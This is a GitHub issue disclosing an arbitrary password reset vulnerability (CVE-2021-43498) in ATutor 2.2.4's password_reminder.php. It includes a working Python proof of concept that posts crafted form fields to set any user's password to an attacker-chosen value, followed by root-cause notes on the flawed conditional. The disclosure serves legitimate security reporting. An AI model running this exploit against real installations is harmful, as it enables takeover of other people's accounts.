Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Arbitrary Password Reset via password_reminder.php #192

Open
rpgmaster280 opened this issue Nov 5, 2021 · 4 comments
Open

Arbitrary Password Reset via password_reminder.php #192

rpgmaster280 opened this issue Nov 5, 2021 · 4 comments

Comments

@rpgmaster280
Copy link

rpgmaster280 commented Nov 5, 2021
edited
Loading

In version 2.2.4, it's currently possible to arbitrarily change the user password to an attacker controlled value. This is caused by a logic flaw when g, id, h, form_password_hidden, and form_change are all set. CVE has been submitted for the issue. POC is below. Please let me know if you have questions or concerns regarding this:

import hashlib, sys, requests

def force_password_change(ip, id, password):
    data = {
            "g" : 9999999999,
            "id" : id,
            "h" : 0,
            "form_password_hidden" : hashlib.sha1(password).hexdigest(),
            "form_change" : ""
    }
    url = "http://%s/ATutor/password_reminder.php" % (ip)
    print("(*) Issuing password reset to URL: %s" % url)
    requests.post(url, data)

def main():
    if len(sys.argv) < 3:
        print('(+) Utility for changing a target users password given the database row number.')
        print('(+) If no password is specified, LetMeIn will be used. Default index for teacher account is 1.')
        print('(+) usage: %s <index> <target_ip> [password]' % sys.argv[0])
        print('(+) eg: %s 1 192.168.1.2'  % sys.argv[0])
        sys.exit(-1)

    id = sys.argv[1]
    ip = sys.argv[2]
    password = "LetMeIn"
    if len(sys.argv) > 3:
        password = sys.argv[3]

    force_password_change(ip, id, password)
    print("(+) Operation complete. Manually test to see if the password changed.")

if __name__ == "__main__":
    main()
@rpgmaster280
Copy link
Author

The conditional statement starting on line 97 is the root source of the issue. It's possible for both conditions (lines 97 and 99) to evaluate to false. There's a third condition that can occur that doesn't seem to be accounted for. Setting an error for this third condition should remedy the issue.

Stronger input validation for these form elements is also highly recommended.

@rpgmaster280
Copy link
Author

rpgmaster280 commented Nov 5, 2021
edited
Loading

Researching the issue further, this issue appears to have already been identified as the TOCTOU Remote Password Reset vulnerability. Metasploit module exploit/linux/http/atutor_filemanager_traversal exploits it. Not sure why, but no CVE has ever been reported for it. I'm not sure why this isn't being listed as an active issue. This seems to have been an issue since at least 2.2.1.

@gregrgay
Copy link
Collaborator

gregrgay commented Nov 5, 2021

ATutor is no longer maintained. You are welcome to submit a pull request with a fix.

@rpgmaster280
Copy link
Author

Issue was designated as CVE-2021-43498 by MITRE.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@gregrgay @rpgmaster280